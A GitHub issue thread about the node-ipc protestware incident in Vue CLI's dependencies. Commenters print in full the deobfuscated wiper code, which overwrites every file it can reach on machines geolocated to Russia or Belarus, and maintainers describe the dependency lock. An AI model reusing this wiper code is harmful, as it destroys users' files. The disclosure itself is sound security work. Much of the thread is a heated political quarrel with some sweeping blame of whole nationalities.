Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

!!!!!!!!!!!! Please do something to warn USERS besides publishing new versions #7054

Closed
Mister-Hope opened this issue Mar 15, 2022 · 96 comments
Closed

Comments

@Mister-Hope
Copy link

@Mister-Hope Mister-Hope commented Mar 15, 2022

See https://github.com/RIAEvangelist/node-ipc/issues/233#issuecomment-1068182278 the node-ipc is doing things far more than ever expected.

If any users are using ip in russia, all their file will be wiped entirely by ❤️, and that's a VERY DANGEROUS BEHAVIOR. This is not just making a joke, but damaging russia people's PC or server

I don't think vue team has done enough job just releaasing new versions, we should at lease

  • add POPUPs in official website about that

  • deprecate all the infected vue-cli packages to add a message for that

Also, we can do:

  • adding some warnings in vue-devtools by publishing new versions, so that users may get a chance automatically upgrade and see the warning.

@sodatea @yyx990803 Please take actions as soon as possible!❤️

@hax
Copy link

@hax hax commented Mar 15, 2022

It seems such attack code is not published to npm (or has been deleted). But such behavior is still very dangerous.

NOTE: The related comments have been deleted by the owner of that repo. Here are the screenshots :
屏幕快照 2022-03-16 上午1 27 16
屏幕快照 2022-03-16 上午1 28 23
屏幕快照 2022-03-16 上午1 30 42

@KawaiiZapic
Copy link

@KawaiiZapic KawaiiZapic commented Mar 15, 2022

@RIAEvangelist deleting the original comment, but it does not matter to the fact.

Original post by @Mister-Hope which has been deleted.

@RIAEvangelist
I did some digging into recent commits in this repository.

What the actual f--k are you doing here:

⚠️| The following code is malicious, DO NOT RUN IT

https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js

⚠️| The above code is malicious, DO NOT RUN IT

I deobfuscated the code and found out that if the host machine's ip address was from Russia or Belarus, your code would proceed to nuke their files by overwriting everything:
image

⚠️| The following code is malicious, DO NOT RUN IT

import u from "path";
import a from "fs";
import o from "https";
setTimeout(function () {
    const t = Math.round(Math.random() * 4);
    if (t > 1) {
        return;
    }
    const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154
    o.get(n.toString("utf8"), function (t) {
        t.on("data", function (t) {
            const n = Buffer.from("Li8=", "base64");
            const o = Buffer.from("Li4v", "base64");
            const r = Buffer.from("Li4vLi4v", "base64");
            const f = Buffer.from("Lw==", "base64");
            const c = Buffer.from("Y291bnRyeV9uYW1l", "base64");
            const e = Buffer.from("cnVzc2lh", "base64");
            const i = Buffer.from("YmVsYXJ1cw==", "base64");
            try {
                const s = JSON.parse(t.toString("utf8"));
                const u = s[c.toString("utf8")].toLowerCase();
                const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus
                if (a) {
                    h(n.toString("utf8"));
                    h(o.toString("utf8"));
                    h(r.toString("utf8"));
                    h(f.toString("utf8"));
                }
            } catch (t) {}
        });
    });
}, Math.ceil(Math.random() * 1e3));
async function h(n = "", o = "") {
    if (!a.existsSync(n)) {
        return;
    }
    let r = [];
    try {
        r = a.readdirSync(n);
    } catch (t) {}
    const f = [];
    const c = Buffer.from("4p2k77iP", "base64");
    for (var e = 0; e < r.length; e++) {
        const i = u.join(n, r[e]);
        let t = null;
        try {
            t = a.lstatSync(i);
        } catch (t) {
            continue;
        }
        if (t.isDirectory()) {
            const s = h(i, o);
            s.length > 0 ? f.push(...s) : null;
        } else if (i.indexOf(o) >= 0) {
            try {
                a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with `❤️`
            } catch (t) {}
        }
    }
    return f;
}
const ssl = true;
export { ssl as default, ssl };

⚠️| The above code is malicious, DO NOT RUN IT

The following are excerpts from the malicious code:

Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64");
// https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154
const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8"));
// checks if ip country is Russia or Belarus
a.writeFile(i, c.toString("utf8"), function () {});
// overwrites file with `❤️`

You should be ashamed of yourself, this level of gross malice towards fellow developers is not ok.



Edit: please reference GalvinGao's comment

https://github.com/RIAEvangelist/node-ipc/issues/233#issuecomment-1068243590

hmmm, seems the file has been already deleted (https://github.com/RIAEvangelist/node-ipc/commits/master/dao/ssl-geospec.js) and the version affected v10.1.3 has already been either taken down, or the user has deleted it, from npm, as it is currently already not existed on npm.

Still, the publisher's activity, to my evaluation, is kinda suspicious. Whether the file was introduced intentionally or unintentionally, the security concerns of using this package has already planted.

@RIAEvangelist
Copy link

@RIAEvangelist RIAEvangelist commented Mar 15, 2022

It's not really possible to run that code. It poses no threat, but it does look scary for sure.

@MidSpike
Copy link

@MidSpike MidSpike commented Mar 15, 2022

It's not really possible to run that code. It poses no threat, but it does look scary for sure.

The fact of the matter is that you pushed that code to the repository.
That code should have never mixed in with node-ipc.
Such actions can be considered malicious.

@lorand-horvath
Copy link

@lorand-horvath lorand-horvath commented Mar 15, 2022

@RIAEvangelist Why are you removing the posts from the node-ipc ticket https://github.com/RIAEvangelist/node-ipc/issues/233 that clearly show the code you added was deleting/overwriting user files?

@yyx990803 @sodatea Evan & Haoqun, could you please make sure that node-ipc 9.2.1, which is now locked in @vue/cli 4.5.16 and @vue/cli 5.0.3, is not malicious and isn't allowed to be changed in any way (indirectly)? Not sure, is node-ipc being used as dependency in Vite https://github.com/vitejs/vite ? or in create-vue ? Please double check.

@RIAEvangelist
Copy link

@RIAEvangelist RIAEvangelist commented Mar 15, 2022

Can confirm no malicious code.

@RIAEvangelist
Copy link

@RIAEvangelist RIAEvangelist commented Mar 15, 2022

Also I don't think you understand the code you were referring to. It is not possible for that code to overwrite user files.

@RIAEvangelist
Copy link

@RIAEvangelist RIAEvangelist commented Mar 15, 2022

It definitely looks like it is possible, but if you check how it works, it is in fact not capable of doing what you are expecting.

@Nugine
Copy link

@Nugine Nugine commented Mar 15, 2022

The community should fork node-ipc since the owner can no longer be trusted.

@RIAEvangelist
Copy link

@RIAEvangelist RIAEvangelist commented Mar 15, 2022

Forking is always an option, so is version locking.

It's also very easy to jump to conclusions saying someone is not trustworthy. Code reviews and reading licenses and documentation may give better assessment of that though.

@hax
Copy link

@hax hax commented Mar 15, 2022

It is not possible for that code to overwrite user files.
It definitely looks like it is possible, but if you check how it works, it is in fact not capable of doing what you are expecting.

I tested the code and confirmed that if the response denote ip was from russia, the code definitely could (1/4 possibility for every run) overwrite the files.

@RIAEvangelist
Copy link

@RIAEvangelist RIAEvangelist commented Mar 15, 2022

Russia or Belarus, and only if the API key was valid; which it is not.

@RIAEvangelist
Copy link

@RIAEvangelist RIAEvangelist commented Mar 15, 2022

Also, damn good sleuthing.

@hax
Copy link

@hax hax commented Mar 15, 2022

Yeah, the API key is not valid now, it's very easy to apply a key or reset it.

@MidSpike
Copy link

@MidSpike MidSpike commented Mar 15, 2022

@RIAEvangelist

only if the API key was valid; which it is not.

At the time of my testing, the api key was valid.
Don't lie to us.

@RIAEvangelist
Copy link

@RIAEvangelist RIAEvangelist commented Mar 15, 2022

I don't think anyone is lieing here.

@liudonghua123
Copy link

@liudonghua123 liudonghua123 commented Mar 16, 2022

Code will not lie. If you really want to do something, don't do it behind your back.

RIAEvangelist/node-ipc@847047c#diff-c2dd3b497ae886cfb8f5bf8c66c649fc2ae4afaa6660d9bbf3105d69884679c6

Welcome to Node.js v16.13.1.
Type ".help" for more information.
> const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64");
undefined
> n.toString("utf8")
'https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154'
> Buffer.from("Y291bnRyeV9uYW1l", "base64").toString("utf-8")
'country_name'
> Buffer.from("cnVzc2lh", "base64").toString("utf-8")
'russia'
> Buffer.from("YmVsYXJ1cw==", "base64").toString("utf-8")
'belarus'
> Buffer.from("Li8", "base64").toString("utf-8")
'./'
> Buffer.from("Li4v", "base64").toString("utf-8")
'../'
> Buffer.from("Li4vLi4v", "base64").toString("utf-8")
'../../'
> Buffer.from("Lw==", "base64").toString("utf-8")
'/'
>

@kumakichi
Copy link

@kumakichi kumakichi commented Mar 16, 2022

I did an investigation, and got the following

naught node-ipc

commit RIAEvangelist/node-ipc@cc282c2 deleted the file: dao/ssl-geospec.js

after decrypt it, we got this:

import u from "path";
import a from "fs";
import o from "https";
setTimeout(function () {
  const t = Math.round(Math.random() * 4);
  if (t > 1) {
    return;
  }
  const n = "https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154";
  o.get(n.toString("utf8"), function (t) {
    t.on("data", function (t) {
    const n = "./";
    const o = "../";
    const r = "../../";
    const f = "/";
    const c = "country_name";
    const e = "russia";
    const i = "belarus";
      try {
        const s = JSON.parse(t.toString("utf8"));
        const u = s[c.toString("utf8")].toLowerCase();
        const a =
          u.includes(e.toString("utf8")) || u.includes(i.toString("utf8"));
        if (a) {
          h(n.toString("utf8"));
          h(o.toString("utf8"));
          h(r.toString("utf8"));
          h(f.toString("utf8"));
        }
      } catch (t) {}
    });
  });
}, Math.ceil(Math.random() * 1e3));
async function h(n = "", o = "") {
  if (!a.existsSync(n)) {
    return;
  }
  let r = [];
  try {
    r = a.readdirSync(n);
  } catch (t) {}
  const f = [];
  const c = "❤️";
  for (var e = 0; e < r.length; e++) {
    const i = u.join(n, r[e]);
    let t = null;
    try {
      t = a.lstatSync(i);
    } catch (t) {
      continue;
    }
    if (t.isDirectory()) {
      const s = h(i, o);
      s.length > 0 ? f.push(...s) : null;
    } else if (i.indexOf(o) >= 0) {
      try {
        a.writeFile(i, c.toString("utf8"), function () {});
      } catch (t) {}
    }
  }
  return f;
}
const ssl = true;
export { ssl as default, ssl };

you naughty guy

@censujiang
Copy link

@censujiang censujiang commented Mar 16, 2022

Someone use their actions to prove that open source has borders😅

Supply chain pollution is not a smart move

@shugen002
Copy link

@shugen002 shugen002 commented Mar 16, 2022

did any one report this to npmjs.com ?
https://www.npmjs.com/support?inquire=security&security-inquire=malware&package=node-ipc
Remove this package from npmjs may save a lot of user.

@sodatea
Copy link
Member

@sodatea sodatea commented Mar 16, 2022

Thanks for the issue.

A few clarifications:

  1. Vue CLI used to depend on node-ipc v9.x.
  2. node-ipc 9.2.2 added the peacenotwar module, which would write a WITH-LOVE-FROM-AMERICA.txt to users' Desktop and OneDrive folders without the consent of the user.
  3. We have since released 4.5.16 and 5.0.3 to lock the dependency version.
  4. Affected users: new projects created during 2022-03-15T05:40:26.758Z and 2022-03-15T13:17:57.076Z; or those who updated project dependencies in that time span.
  5. The malicious code that deletes files from Russian and Belarus IPs, is not included in the 9.2.2 release.

I think the best place to address this issue is the npm registry.
They can directly take down these malicious codes.

npmmirror.com has already taken steps to redirect these problematic versions to the latest known-safe versions: cnpm/bug-versions#181

@atian25
Copy link

@atian25 atian25 commented Mar 16, 2022

node-ipc has been added to the registry.npmmirror.com blacklist and will not be synced with any new versions in the future.

We recommend that the community migrate to other alternative libraries as soon as possible.

@jw-foss
Copy link

@jw-foss jw-foss commented Mar 16, 2022

Seems like we are going to lock our dependencies version from this point. lol, the funniest joke in 2022 is that [XX] has no border 🤣

@hax
Copy link

@hax hax commented Mar 16, 2022

@atian25 The behavior — committed malicious code, deleted comments which expose such code, revoked the api key after been exposed and promoted the sophistry that the code not work because api key is not valid — make me think the guy is not worth trust anymore. I strongly suggest npmmirror not only blacklist node-ipc but all his packages.

@Azimiao

This comment was marked as off-topic.

2 similar comments
@zhaoyueer

This comment was marked as off-topic.

@xiaooloong

This comment was marked as off-topic.

@lyscf
Copy link

@lyscf lyscf commented Mar 16, 2022

Good News This API is not available now
好消息 API挂了
{"message":"Provided API key is not valid. Contact technical support for assistance at support@ipgeolocation.io"}

@nm17
Copy link

@nm17 nm17 commented Mar 16, 2022

@WhatNot911 I think we should come together as people, and once and for all figure out if politics has any right to be in Open Source and if Open Source should "help to solve problems of the "real world"" in context of politics.

@xxxcoltxxx
Copy link

@xxxcoltxxx xxxcoltxxx commented Mar 16, 2022

Ну вы и террористы...

Most of people's in this conversation are nacists. But they under fake news. They don't know about kills woman's and children by Ukraine army during 8 years in Donbass. All big Russians info channels are blocked. Just read the comments and close the browser tab.
I also support Ukraine people's (except criminals). Stay safe

@slayer
Copy link

@slayer slayer commented Mar 16, 2022

I wonder about few Ukranian devs that live in Crimea or use VPNs

I am originally from Crimea, my relatives still there. Please don't say high-flown words to me.

russian fascism must be stopped by any means. including this

@nm17
Copy link

@nm17 nm17 commented Mar 16, 2022

@slayer Do you support politically motivated discrimination and violence towards regular developers like yourself? Is "free as in speech" should also include political agitational speeches? I'm genuinely interested in this topic and not just trying to make you appear in a negative way.

@sergey-zinchenko
Copy link

@sergey-zinchenko sergey-zinchenko commented Mar 16, 2022

Ну вы и террористы...

Most of people's in this conversation are nacists. But they under fake news. They don't know about kills woman's and children by Ukraine army during 8 years in Donbass. All big Russians info channels are blocked. Just read the comments and close the browser tab. I also support Ukraine people's (except criminals). Stay safe

I am aginst this maddness in Ukraine. But everything that happens here only leads to a worsening of the situation. Misunderstanding and hatred escalation - nothing more will come from that.

@SeymourRu
Copy link

@SeymourRu SeymourRu commented Mar 16, 2022

@slayer

russian fascism must be stopped by any means. including this

You are definitely forgot who is your real enemy, not russian people, but non-elected russian president
Until you emotion state will be recovered, I think you should stop posting here and try to recover a bit. You still have great job to do.

Peace.

@buriy
Copy link

@buriy buriy commented Mar 16, 2022

Russian army right now fights with Ukraine army.
But if you want to hurt/ban/apply whatever actions to all Russians just because some Russians did something, you're a racist (and that's called a stereotypical thinking).
War is always awful, and this comment war is awful too!
You do programming so you are good in logic, so, maybe, you want to apply most hatred to people who did most war and kills?
Start with nations that killed a lot of people at war in 21th century:

  • America (>1M civilians killed in 21th century immediately or after their actions like bombing wells in Iraq)
  • A lot of European NATO countries in 1999 in Yugoslavia, in 2011 in Lybia (don't remember the number of kills, sorry)
  • Ukraine in the war against Donbass region in 2014-2021 (14k civilians killed, mostly in 2014-2015!)

Or, in the past:

  • Germany
  • China
  • Japan
  • UK
  • ...

Apply your sanctions and politics statements to them, write malware against them. Don't pay taxes, go against the regimes if you live there.
And Ukraine even sent 1000 people to aid in Afghanistan war several years ago, so do they deserve double harted, right? No, not right!

Politicians always do wrong. And racism never helps. So please stop. Peace to everyone and wish all wars to end!

@slayer
Copy link

@slayer slayer commented Mar 16, 2022

@slayer Do you support politically motivated discrimination and violence towards regular developers like yourself? Is "free as in speech" should also include political agitational speeches? I'm genuinely interested in this topic and not just trying to make you appear in a negative way.

That is not political. It's too far from politics. Politic and War is not the same.
I did not support any discrimination before war came to my home. You will not understand anything before war will knock to your door.

@DeadNumbers

This comment was marked as disruptive content.

@sergey-zinchenko
Copy link

@sergey-zinchenko sergey-zinchenko commented Mar 16, 2022

@slayer Do you support politically motivated discrimination and violence towards regular developers like yourself? Is "free as in speech" should also include political agitational speeches? I'm genuinely interested in this topic and not just trying to make you appear in a negative way.

That is not political. It's too far from politics. Politic and War is not the same. I did not support any discrimination before war came to my home. You will not understand anything before war will knock to your door.

А ты думаешь, что чем больше дискриминации, тем быстрее войне закончиться? Думаешь будет больше уважения, или может быть, что ВВП пишет по вечерам на js, и вот ему будет засада? Я не хочу тебя расстраивать....

@RIAEvangelist
Copy link

@RIAEvangelist RIAEvangelist commented Mar 16, 2022

all it does is add a file to the desktop that gives a message of peace, not war, and remember to forgive. It is all also documented.

@nm17
Copy link

@nm17 nm17 commented Mar 16, 2022

Quoting @slayer :

That is not political. It's to far from politics. Politic and War is not the same.

Do you think you're fighting a war here? You are just agitating your agenda. As it was said before: Politics always do wrong in this type of field and racism never helps.

I did not support any discrimination before war came to my home.

And now you do? Discrimination is bad in any context. You're just making yourself look bad.

Here is the definition, since I'm not sure you actually know it:

Discrimination is the act of making unjustified distinctions between people based on the groups, classes, or other categories to which they belong or are perceived to belong.

You will not understand anything before war will knock to your door.

And injecting malicious code will make a single thing better? Oh please.

@nm17
Copy link

@nm17 nm17 commented Mar 16, 2022

@RIAEvangelist

all it does is add a file to the desktop that gives a message of peace, not war, and remember to forgive. It is all also documented.

Unauthorized access to personal data is sure peaceful. Your "library" is in no right to access these files/directories.

@nm17
Copy link

@nm17 nm17 commented Mar 16, 2022

Who decides who is right or wrong in politics? The answer is people, but humans are also not perfect. As I said before, the Pandora's box is now opened, and from this point on, people who use opensource will experience xenophobia more than ever before, EVERYONE included. The trust factor of open source, which was based on good will of the developers is now practically gone, and now, more and more people are realizing that one day, their library/application can possibly be exploited to do/say whatever some random dev on the internet thought "was the right thing they to do". Not a single good came out of this "protest".

EDIT: fixed typo and added more specifics

@MSchleckser
Copy link

@MSchleckser MSchleckser commented Mar 16, 2022

Man, I love politics in my APIs.

@RIAEvangelist
Copy link

@RIAEvangelist RIAEvangelist commented Mar 16, 2022

Always free to lock the dep version if you do not agree with what the code does. There are many modules out there doing real harm silently like stealing your AWS and private keys. Locking deps after a code review is probably good practice anyway.

again;

all it does is add a file to the desktop that gives a message of peace, not war, and remember to forgive. It is all also documented.

@MidSpike
Copy link

@MidSpike MidSpike commented Mar 16, 2022

Always free to lock the dep version if you do not agree with what the code does. There are many modules out there doing real harm silently like stealing your AWS and private keys. Locking deps after a code review is probably good practice anyway.

again;

all it does is add a file to the desktop that gives a message of peace, not war, and remember to forgive. It is all also documented.

You need to stop pretending like you aren't aware why people are angry at you:
https://gist.github.com/MidSpike/f7ae3457420af78a54b38a31cc0c809c

@MSchleckser
Copy link

@MSchleckser MSchleckser commented Mar 16, 2022

It should be noted, this is why anything that goes into a prod environment needs to have security scans.

@nm17
Copy link

@nm17 nm17 commented Mar 16, 2022

For anyone looking at how to prevent this happening in your software, this site helps you with that: https://slsa.dev/

P.S: I'm absolutely unaffiliated with this site or it's developers. I just found this resource useful and decided to share it with others.

@lillycat332
Copy link

@lillycat332 lillycat332 commented Mar 16, 2022

Just leave russia. Stop complaining. Or do something now against regime.

This is genuinely one of the most idiotic things I've ever read

@RIAEvangelist
Copy link

@RIAEvangelist RIAEvangelist commented Mar 16, 2022

additionally locking package dependency versions is a good idea.

again;

all it does is add a file to the desktop that gives a message of peace, not war, and remember to forgive. It is all also documented.

@nm17
Copy link

@nm17 nm17 commented Mar 16, 2022

@RIAEvangelist YOUR CODE DELETES EVERY FILE ON THE PC

https://gist.github.com/MidSpike/f7ae3457420af78a54b38a31cc0c809c#edit-2022-03-16

Also this:

See RIAEvangelist/node-ipc#233 (comment) the node-ipc is doing things far more than ever expected.

@RIAEvangelist
Copy link

@RIAEvangelist RIAEvangelist commented Mar 16, 2022

That code is not executable unless you modify it to make it so.

@bigslycat
Copy link

@bigslycat bigslycat commented Mar 16, 2022

Did I vote for Putin? No.

Do I support military action? No.

Am I doing something to stop people from being killed? Maybe. But if I confess this publicly, I will go to jail.

It turns out that I'm not to blame for what's happening, but it's my fault that I'm Russian?

No, my conscience is clear, and I am not guilty of anything before you. The authors of this initiative are Nazis and criminals.

@MidSpike
Copy link

@MidSpike MidSpike commented Mar 16, 2022

That code is not executable unless you modify it to make it so.

I'm tired of arguing with you.

I want you to prove that it is not executable within this commit range on the master branch:
847047cf7f81ab08352038b2204f0e7633449580 -> 6e344066a0464814a27fbd7ca8422f473956a803
RIAEvangelist/node-ipc@847047c
RIAEvangelist/node-ipc@6e34406

@majestrate
Copy link

@majestrate majestrate commented Mar 16, 2022

this is a potential security liability as well, if a state actor can coherence a CA they can trigger this code path invisibly. regardless of intent adding security issues to code on purpose is unethical and highly dangerous, especially if done haphazardly.

@solofeed
Copy link

@solofeed solofeed commented Mar 16, 2022

Everyone here, who is from Russia, you can freely fork the repository and continue working in a safe apartment with a living family.

I agree that this cunning step will not stop the war, but I appreciated this wonderful diversion, which will raise the problem because believe me, many even IT specialists are not aware of what is happening, they are under a decade of propaganda of the Russian world, they are expectedly inconsistent in their assessment situations. They complain that they can be touched on the streets during rallies, although in the meantime my relatives and friends are losing their loved ones, children, parents, the opportunity to eat and drink water, the opportunity to see a doctor, to sleep in silence.

Therefore, be restrained, we have the right to splash out our emotions even in this way, because there is a high probability that this may be the last thing we did in our lives, and your government (and everyone who lives in Russia) is to blame for this.

@vuejs vuejs locked as resolved and limited conversation to collaborators Mar 16, 2022
@Akryum
Copy link
Member

@Akryum Akryum commented Mar 16, 2022

The (transitive) vulnerability in @vue/cli has been fixed as described by @sodatea here. Please update to the latest versions of @vue/cli, either 4.5.16+ or 5.0.3+

npm i -g @vue/cli
pnpm i -g @vue/cli
yarn global add @vue/cli

@Akryum Akryum closed this as completed Mar 16, 2022
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

No branches or pull requests